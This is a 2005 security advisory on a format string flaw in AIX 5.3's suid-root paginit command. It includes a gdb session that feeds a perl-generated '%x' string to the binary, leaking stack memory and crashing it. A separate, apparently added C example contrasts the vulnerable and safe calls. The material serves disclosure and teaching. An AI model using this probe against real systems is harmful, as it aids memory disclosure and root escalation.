Computer Academic Underground
http://www.caughq.org

Security Advisory
===============/========================================================
Advisory ID:       CAU-2005-0003
Release Date:      06/06/2005
Title:             IBM AIX paginit Command-line Argument Format String
Application/OS:    AIX 5.3 paginit
Topic:             Format string vulnerability in paginit's command-line argument
Vendor Status:     Not Notified
Attributes:        Local Format String
Advisory URL:      http://www.caughq.org/advisories/CAU-2005-0003.txt
Author/Email:      intropy
===============/========================================================

Overview
========

A format string vulnerability exists in paginit when handling command-line arguments.

Impact
======

The program runs as suid root. Exploitation is probable, leading to super-user rights or disclosure of memory.

Affected Systems
================

AIX 5.3 (although others are likely vulnerable)

Technical Explanation
=====================

When paginit attempts to print the supplied error information, memory locations can be disclosed or code executed.
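To make the bug class concrete before the gdb session that follows, here is an added example (not paginit's source, which the advisory does not include): a hypothetical logging wrapper called with argv data as its format, the hardened form that passes the same data through a constant "%s" format, and a small audit helper that counts conversion directives in data headed for a format sink. The message prefix "3004-616 User " is taken from the session below; everything else is assumed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
/* Hypothetical logging wrapper. Calling it with untrusted data as `fmt` is
 * the bug class in the advisory: %x/%n in the data drive the printf engine
 * (_doprnt on AIX, where the crash below landed). */
static void log_err(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
}

/* Vulnerable pattern, for contrast only: argv-derived string as format. */
static void report_user_unsafe(const char *user)
{
    log_err(user);                 /* BUG: user controls the format string */
}

/* Hardened form: constant format, untrusted string passed as a %s argument.
 * Returns the length the full message needs (snprintf semantics). */
static int report_user_safe(char *out, size_t outlen, const char *user)
{
    return snprintf(out, outlen, "3004-616 User \"%s\"", user);
}

/* Audit check: count conversion directives in a string about to reach a
 * format sink ("%%" is a literal percent). Nonzero for argv/env data means
 * the data is being used where a constant format belongs. */
static int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }   /* skip escaped %% */
        n++;
    }
    return n;
}

int main(int argc, char **argv)
{
    char buf[256];
    const char *user = argc > 1 ? argv[1] : "%x%x%x%x";   /* constructed */
    report_user_safe(buf, sizeof buf, user);
    printf("%s  (directives in input: %d)\n", buf, count_format_directives(user));
    (void)report_user_unsafe;      /* never invoked */
    return 0;
}
```

With the safe form the "%x" run is printed back literally; with the unsafe wrapper the same input walks the stack exactly as the gdb output shows.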
GNU gdb 6.0
Starting program: /usr/bin/paginit `perl -e 'print "%x" x 1024;'`
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
3004-616 User "20002c8047000f01f6aa8200407802ff22ead2ff22ead0200417c80000000000
eadbeef2ff22571deadbeef020001f182000076c200004402ff225602ff224b04428244410000a4
0020000688002ff224b00000200006880020002a18deadbeefdeadbeefdeadbeefdeadbeefdeadb
efdeadbeefdeadbeef001000018c00012ff224fc2ff22504deadbeef2ff22ff804030000f01f443
00002ff225602ff2257102ff22d722ff22d832ff22d972ff22da22ff22dc12ff22dd42ff22ded2f
f22df72ff22e0c2ff22e692ff22e832ff22e932ff22e9e2ff22ea82ff22eb32

Program received signal SIGSEGV, Segmentation fault.
0xd0226bc4 in _doprnt () from /usr/lib/libc.a(shr.o)

Solution & Recommendations
==========================

Ask IBM for a patch.

Exploitation
============

Not available.

References
==========

Credits & Gr33ts
================

CAU